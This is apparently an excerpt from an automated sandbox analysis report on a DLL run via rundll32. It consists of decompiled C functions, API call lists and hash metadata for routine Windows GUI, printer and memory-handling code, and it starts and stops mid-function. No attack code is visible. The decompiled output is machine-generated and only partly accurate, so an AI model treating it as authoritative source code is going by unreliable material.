                                                                                                                                                                            					return E100167D5(E1001486F(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t14 = GetStockObject(0xd);
                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                            					goto L6;
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L2;
                                                                                                                                                                            			}

















                                                                                                                                                                            0x100149c4
                                                                                                                                                                            0x100149cb
                                                                                                                                                                            0x100149d0
                                                                                                                                                                            0x100149d9
                                                                                                                                                                            0x100149dc
                                                                                                                                                                            0x100149df
                                                                                                                                                                            0x100149e4
                                                                                                                                                                            0x100149e8
                                                                                                                                                                            0x100149f2
                                                                                                                                                                            0x10014a01
                                                                                                                                                                            0x10014a05
                                                                                                                                                                            0x10014a12
                                                                                                                                                                            0x10014a14
                                                                                                                                                                            0x10014a16
                                                                                                                                                                            0x10014a16
                                                                                                                                                                            0x10014a31
                                                                                                                                                                            0x10014a34
                                                                                                                                                                            0x10014a34
                                                                                                                                                                            0x10014a3a
                                                                                                                                                                            0x10014a3a
                                                                                                                                                                            0x10014a40
                                                                                                                                                                            0x10014a42
                                                                                                                                                                            0x10014a42
                                                                                                                                                                            0x10014a5d
                                                                                                                                                                            0x10014a5d
                                                                                                                                                                            0x100149ec
                                                                                                                                                                            0x100149f0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 100149E4
                                                                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 100149EC
                                                                                                                                                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 100149F9
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 10014A08
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10014A1C
                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 10014A28
                                                                                                                                                                            • ReleaseDC.USER32 ref: 10014A34
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                                                                            • String ID: System
                                                                                                                                                                            • API String ID: 46613423-3470857405
                                                                                                                                                                            • Opcode ID: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
                                                                                                                                                                            • Instruction ID: a63e4a091ca1b7be2859df30e5517b7a4abcdff67d16382c886f5131b7cbdf71
                                                                                                                                                                            • Opcode Fuzzy Hash: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
                                                                                                                                                                            • Instruction Fuzzy Hash: 39118F71A40268EBEB10DBA1CC85FAE7BB8FF04781F420015FA02AA190DE709D46CB65
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                            			E10009360(intOrPtr __ecx, intOrPtr _a4) {
                                                                                                                                                                            				long _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				long _v16;
                                                                                                                                                                            				long _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				long _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                            				long _t49;
                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                            				void* _t60;
                                                                                                                                                                            				long _t76;
                                                                                                                                                                            				void* _t84;
                                                                                                                                                                            				void* _t85;
                                                                                                                                                                            
                                                                                                                                                                            				_v32 = __ecx;
                                                                                                                                                                            				if(_a4 == 8) {
                                                                                                                                                                            					return E100090F0(_t60, _v32, _t84, _t85);
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_a4 == 9) {
                                                                                                                                                                            					_t38 =  *0x10058ece & 0x000000ff;
                                                                                                                                                                            					if(_t38 != 0) {
                                                                                                                                                                            						_v8 = SendMessageA( *(_v32 + 0x94), 0xe, 0, 0);
                                                                                                                                                                            						_v12 = _v32 + 0x74;
                                                                                                                                                                            						SendMessageA( *(_v12 + 0x20), 0xb1, _v8, _v8);
                                                                                                                                                                            						if(0 == 0) {
                                                                                                                                                                            							SendMessageA( *(_v12 + 0x20), 0xb7, 0, 0);
                                                                                                                                                                            						}
                                                                                                                                                                            						_t76 =  *0x10058f0c; // 0x1005aa2c
                                                                                                                                                                            						_v16 = _t76;
                                                                                                                                                                            						SendMessageA( *(_v32 + 0x94), 0xc2, 0, _v16);
                                                                                                                                                                            						if(_v8 > 0x1000) {
                                                                                                                                                                            							_t50 =  *0x10058f0c; // 0x1005aa2c
                                                                                                                                                                            							_t21 = _t50 - 0xc; // 0x0
                                                                                                                                                                            							_v20 =  *_t21;
                                                                                                                                                                            							_v24 = _v32 + 0x74;
                                                                                                                                                                            							SendMessageA( *(_v24 + 0x20), 0xb1, 0, _v20);
                                                                                                                                                                            							if(0 == 0) {
                                                                                                                                                                            								SendMessageA( *(_v24 + 0x20), 0xb7, 0, 0);
                                                                                                                                                                            							}
                                                                                                                                                                            							SendMessageA( *(_v32 + 0x94), 0xc2, 0, 0x100295fc);
                                                                                                                                                                            						}
                                                                                                                                                                            						_v28 = SendMessageA( *(_v32 + 0x94), 0xba, 0, 0);
                                                                                                                                                                            						_t49 = SendMessageA( *(_v32 + 0x94), 0xb6, 0, _v28);
                                                                                                                                                                            						 *0x10058ece = 0;
                                                                                                                                                                            						return _t49;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t38;
                                                                                                                                                                            			}

















                                                                                                                                                                            0x10009366
                                                                                                                                                                            0x1000936d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10009372
                                                                                                                                                                            0x10009380
                                                                                                                                                                            0x10009386
                                                                                                                                                                            0x1000938f
                                                                                                                                                                            0x100093ab
                                                                                                                                                                            0x100093b4
                                                                                                                                                                            0x100093cb
                                                                                                                                                                            0x100093d3
                                                                                                                                                                            0x100093e5
                                                                                                                                                                            0x100093e5
                                                                                                                                                                            0x100093eb
                                                                                                                                                                            0x100093f1
                                                                                                                                                                            0x10009409
                                                                                                                                                                            0x10009416
                                                                                                                                                                            0x10009418
                                                                                                                                                                            0x1000941d
                                                                                                                                                                            0x10009420
                                                                                                                                                                            0x10009429
                                                                                                                                                                            0x1000943e
                                                                                                                                                                            0x10009446
                                                                                                                                                                            0x10009458
                                                                                                                                                                            0x10009458
                                                                                                                                                                            0x10009474
                                                                                                                                                                            0x10009474
                                                                                                                                                                            0x10009493
                                                                                                                                                                            0x100094ab
                                                                                                                                                                            0x100094b1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100094b1
                                                                                                                                                                            0x1000938f
                                                                                                                                                                            0x100094bb

                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 100093A5
                                                                                                                                                                            • SendMessageA.USER32(?,000000B1,?,?), ref: 100093CB
                                                                                                                                                                            • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 100093E5
                                                                                                                                                                            • SendMessageA.USER32(?,000000C2,00000000,?), ref: 10009409
                                                                                                                                                                            • SendMessageA.USER32(?,000000B1,00000000,?), ref: 1000943E
                                                                                                                                                                            • SendMessageA.USER32(00000000,000000B7,00000000,00000000), ref: 10009458
                                                                                                                                                                            • SendMessageA.USER32(?,000000C2,00000000,100295FC), ref: 10009474
                                                                                                                                                                            • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 1000948D
                                                                                                                                                                            • SendMessageA.USER32(?,000000B6,00000000,?), ref: 100094AB
                                                                                                                                                                              • Part of subcall function 100090F0: _strlen.LIBCMT ref: 100091CA
                                                                                                                                                                              • Part of subcall function 100090F0: _strlen.LIBCMT ref: 100091E4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$_strlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3697954797-0
                                                                                                                                                                            • Opcode ID: 2ffd05dad576676297fb9eaf6dbc442549bb5f90649f9ff9e88f90ce09603060
                                                                                                                                                                            • Instruction ID: 329eb70852e0cb7846d89551eaf01311ead5dc39bdcc3cc6f9670776eeec1b90
                                                                                                                                                                            • Opcode Fuzzy Hash: 2ffd05dad576676297fb9eaf6dbc442549bb5f90649f9ff9e88f90ce09603060
                                                                                                                                                                            • Instruction Fuzzy Hash: BE411974A40205AFEB04CBA4CD99FAEB7B5FB4C740F208159FA45AB3D5C775AA02CB50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                            			E10013C4D(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				void* _t36;
                                                                                                                                                                            				void* _t39;
                                                                                                                                                                            				long _t41;
                                                                                                                                                                            				void* _t42;
                                                                                                                                                                            				long _t47;
                                                                                                                                                                            				void* _t53;
                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                            				long* _t62;
                                                                                                                                                                            				struct _CRITICAL_SECTION* _t64;
                                                                                                                                                                            				void* _t65;
                                                                                                                                                                            				void* _t66;
                                                                                                                                                                            
                                                                                                                                                                            				_push(0x10);
                                                                                                                                                                            				E10017BF4(E10028893, __ebx, __edi, __esi);
                                                                                                                                                                            				_t62 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
                                                                                                                                                                            				_t64 = __ecx + 0x1c;
                                                                                                                                                                            				 *(_t66 - 0x14) = _t64;
                                                                                                                                                                            				EnterCriticalSection(_t64);
                                                                                                                                                                            				_t36 =  *(_t66 + 8);
                                                                                                                                                                            				if(_t36 <= 0 || _t36 >= _t62[3]) {
                                                                                                                                                                            					_push(_t64);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t65 = TlsGetValue( *_t62);
                                                                                                                                                                            					if(_t65 == 0) {
                                                                                                                                                                            						 *(_t66 - 4) = 0;
                                                                                                                                                                            						_t39 = E10013965(0x10);
                                                                                                                                                                            						__eflags = _t39;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							_t65 = 0;
                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							 *_t39 = 0x1002b1d8;
                                                                                                                                                                            							_t65 = _t39;
                                                                                                                                                                            						}
                                                                                                                                                                            						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
                                                                                                                                                                            						_t51 =  &(_t62[5]);
                                                                                                                                                                            						 *(_t65 + 8) = 0;
                                                                                                                                                                            						 *(_t65 + 0xc) = 0;
                                                                                                                                                                            						E10013A82( &(_t62[5]), _t65);
                                                                                                                                                                            						goto L5;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t55 =  *(_t66 + 8);
                                                                                                                                                                            						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
                                                                                                                                                                            							L5:
                                                                                                                                                                            							_t75 =  *(_t65 + 0xc);
                                                                                                                                                                            							if( *(_t65 + 0xc) != 0) {
                                                                                                                                                                            								_t41 = E100134F9(_t51, __eflags, _t62[3], 4);
                                                                                                                                                                            								_t53 = 2;
                                                                                                                                                                            								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t47 = E100134F9(_t51, _t75, _t62[3], 4);
                                                                                                                                                                            								_pop(_t53);
                                                                                                                                                                            								_t42 = LocalAlloc(0, _t47);
                                                                                                                                                                            							}
                                                                                                                                                                            							_t76 = _t42;
                                                                                                                                                                            							if(_t42 == 0) {
                                                                                                                                                                            								LeaveCriticalSection( *(_t66 - 0x14));
                                                                                                                                                                            								_t42 = E1000A0A7(0, _t53, _t62, _t65, _t76);
                                                                                                                                                                            							}
                                                                                                                                                                            							 *(_t65 + 0xc) = _t42;
                                                                                                                                                                            							E100174D0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
                                                                                                                                                                            							 *(_t65 + 8) = _t62[3];
                                                                                                                                                                            							TlsSetValue( *_t62, _t65);
                                                                                                                                                                            							_t55 =  *(_t66 + 8);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_t36 =  *(_t65 + 0xc);
                                                                                                                                                                            					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
                                                                                                                                                                            						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
                                                                                                                                                                            					}
                                                                                                                                                                            					_push( *(_t66 - 0x14));
                                                                                                                                                                            				}
                                                                                                                                                                            				LeaveCriticalSection();
                                                                                                                                                                            				return E10017C60(_t36);
                                                                                                                                                                            			}














                                                                                                                                                                            0x10013c4d
                                                                                                                                                                            0x10013c54
                                                                                                                                                                            0x10013c59
                                                                                                                                                                            0x10013c5b
                                                                                                                                                                            0x10013c5e
                                                                                                                                                                            0x10013c62
                                                                                                                                                                            0x10013c65
                                                                                                                                                                            0x10013c6b
                                                                                                                                                                            0x10013c72
                                                                                                                                                                            0x10013d73
                                                                                                                                                                            0x10013c81
                                                                                                                                                                            0x10013c89
                                                                                                                                                                            0x10013c8d
                                                                                                                                                                            0x10013cc1
                                                                                                                                                                            0x10013cc4
                                                                                                                                                                            0x10013cc9
                                                                                                                                                                            0x10013ccb
                                                                                                                                                                            0x10013cd7
                                                                                                                                                                            0x10013cd7
                                                                                                                                                                            0x10013ccd
                                                                                                                                                                            0x10013ccd
                                                                                                                                                                            0x10013cd3
                                                                                                                                                                            0x10013cd3
                                                                                                                                                                            0x10013cd9
                                                                                                                                                                            0x10013cde
                                                                                                                                                                            0x10013ce1
                                                                                                                                                                            0x10013ce4
                                                                                                                                                                            0x10013ce7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10013c8f
                                                                                                                                                                            0x10013c8f
                                                                                                                                                                            0x10013c95
                                                                                                                                                                            0x10013ca4
                                                                                                                                                                            0x10013ca4
                                                                                                                                                                            0x10013ca7
                                                                                                                                                                            0x10013d0b
                                                                                                                                                                            0x10013d11
                                                                                                                                                                            0x10013d16
                                                                                                                                                                            0x10013ca9
                                                                                                                                                                            0x10013cae
                                                                                                                                                                            0x10013cb4
                                                                                                                                                                            0x10013cb7
                                                                                                                                                                            0x10013cb7
                                                                                                                                                                            0x10013d1c
                                                                                                                                                                            0x10013d1e
                                                                                                                                                                            0x10013d23
                                                                                                                                                                            0x10013d29
                                                                                                                                                                            0x10013d29
                                                                                                                                                                            0x10013d31
                                                                                                                                                                            0x10013d42
                                                                                                                                                                            0x10013d4e
                                                                                                                                                                            0x10013d53
                                                                                                                                                                            0x10013d59
                                                                                                                                                                            0x10013d59
                                                                                                                                                                            0x10013c95
                                                                                                                                                                            0x10013d5c
                                                                                                                                                                            0x10013d61
                                                                                                                                                                            0x10013d6b
                                                                                                                                                                            0x10013d6b
                                                                                                                                                                            0x10013d6e
                                                                                                                                                                            0x10013d6e
                                                                                                                                                                            0x10013d74
                                                                                                                                                                            0x10013d7f

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 10013C54
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,00000010,10013E18,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013C65
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013C83
                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013CB7
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23
                                                                                                                                                                            • _memset.LIBCMT ref: 10013D42
                                                                                                                                                                            • TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1891723912-0
                                                                                                                                                                            • Opcode ID: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
                                                                                                                                                                            • Instruction ID: 361604de1dd3242a2b5db774f8c39e7d6c7c8771dcfb3c7945be7f3a81b5ec95
                                                                                                                                                                            • Opcode Fuzzy Hash: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
                                                                                                                                                                            • Instruction Fuzzy Hash: 3F317C74500616AFDB20DF65E886C5EBBB5FF04350B21C529F95AAB661CB30ED90CB80
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                            			E1000A6E3(void* __ecx, char* _a4) {
                                                                                                                                                                            				void* _v8;
                                                                                                                                                                            				void* _t15;
                                                                                                                                                                            				void* _t20;
                                                                                                                                                                            				void* _t35;
                                                                                                                                                                            
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				_t35 = __ecx;
                                                                                                                                                                            				_t15 =  *(__ecx + 0x74);
                                                                                                                                                                            				if(_t15 != 0) {
                                                                                                                                                                            					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                            						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                                                                                                                                                                            						if(_t15 != 0) {
                                                                                                                                                                            							_t18 =  *(_t35 + 0x70);
                                                                                                                                                                            							if( *(_t35 + 0x70) != 0) {
                                                                                                                                                                            								E10014056(_t18);
                                                                                                                                                                            							}
                                                                                                                                                                            							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                                                                                                                                                                            							 *(_t35 + 0x70) = _t20;
                                                                                                                                                                            							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                                                                                                                                                                            								E10014056( *(_t35 + 0x70));
                                                                                                                                                                            								 *(_t35 + 0x70) = 0;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t15 = ClosePrinter(_v8);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t15;
                                                                                                                                                                            			}







                                                                                                                                                                            0x1000a6e6
                                                                                                                                                                            0x1000a6e8
                                                                                                                                                                            0x1000a6ea
                                                                                                                                                                            0x1000a6f2
                                                                                                                                                                            0x1000a70c
                                                                                                                                                                            0x1000a714
                                                                                                                                                                            0x1000a71e
                                                                                                                                                                            0x1000a725
                                                                                                                                                                            0x1000a727
                                                                                                                                                                            0x1000a72c
                                                                                                                                                                            0x1000a72f
                                                                                                                                                                            0x1000a72f
                                                                                                                                                                            0x1000a746
                                                                                                                                                                            0x1000a74d
                                                                                                                                                                            0x1000a765
                                                                                                                                                                            0x1000a76a
                                                                                                                                                                            0x1000a76f
                                                                                                                                                                            0x1000a76f
                                                                                                                                                                            0x1000a775
                                                                                                                                                                            0x1000a775
                                                                                                                                                                            0x1000a725
                                                                                                                                                                            0x1000a77a
                                                                                                                                                                            0x1000a77e

                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 1000A700
                                                                                                                                                                            • lstrcmpA.KERNEL32(?,?), ref: 1000A70C
                                                                                                                                                                            • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1000A71E
                                                                                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A73E
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A746
                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 1000A750
                                                                                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1000A75D
                                                                                                                                                                            • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1000A775
                                                                                                                                                                              • Part of subcall function 10014056: GlobalFlags.KERNEL32(?), ref: 10014061
                                                                                                                                                                              • Part of subcall function 10014056: GlobalUnlock.KERNEL32(?,?,?,1000A4C2,?,00000004,1000146F), ref: 10014073
                                                                                                                                                                              • Part of subcall function 10014056: GlobalFree.KERNEL32 ref: 1001407E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 168474834-0
                                                                                                                                                                            • Opcode ID: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
                                                                                                                                                                            • Instruction ID: f32a97280aef975bd063cd01cc2dace1ac46c13f829f9411547ae7bffa227ebc
                                                                                                                                                                            • Opcode Fuzzy Hash: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
                                                                                                                                                                            • Instruction Fuzzy Hash: ED11A075500600BBEB22CBBADC89DAF7AFDFB89B807104519F60AD5021DB31DD91DB20
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10013854(void* __ecx) {
                                                                                                                                                                            				struct HDC__* _t18;
                                                                                                                                                                            				void* _t19;
                                                                                                                                                                            
                                                                                                                                                                            				_t19 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
                                                                                                                                                                            				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
                                                                                                                                                                            				 *0x1005aa30 = GetSystemMetrics(2) + 1;
                                                                                                                                                                            				 *0x1005aa34 = GetSystemMetrics(3) + 1;
                                                                                                                                                                            				_t18 = GetDC(0);
                                                                                                                                                                            				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
                                                                                                                                                                            				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
                                                                                                                                                                            				return ReleaseDC(0, _t18);
                                                                                                                                                                            			}





                                                                                                                                                                            0x1001385f
                                                                                                                                                                            0x10013865
                                                                                                                                                                            0x1001386c
                                                                                                                                                                            0x10013874
                                                                                                                                                                            0x1001387e
                                                                                                                                                                            0x1001388f
                                                                                                                                                                            0x10013899
                                                                                                                                                                            0x100138a1
                                                                                                                                                                            0x100138ad

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10013861
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10013868
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 1001386F
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10013879
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 10013883
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 10013894
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1001389C
                                                                                                                                                                            • ReleaseDC.USER32 ref: 100138A4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1151147025-0
                                                                                                                                                                            • Opcode ID: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
                                                                                                                                                                            • Instruction ID: d97b14313f3971f9b273ebf2d99ed84bfce9517748686708ee6192b13dda979b
                                                                                                                                                                            • Opcode Fuzzy Hash: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
                                                                                                                                                                            • Instruction Fuzzy Hash: CEF03071A40714AFFB20AF728CC9F677BA8EB81B51F11491AE6428B6D0D7B59806CF50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                            			E1000BD98(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
                                                                                                                                                                            				char _v4;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				char* _v16;
                                                                                                                                                                            				void* _v20;
                                                                                                                                                                            				char* _v24;
                                                                                                                                                                            				char _v28;
                                                                                                                                                                            				long _v32;
                                                                                                                                                                            				char _v36;
                                                                                                                                                                            				char _v272;
                                                                                                                                                                            				char _v280;
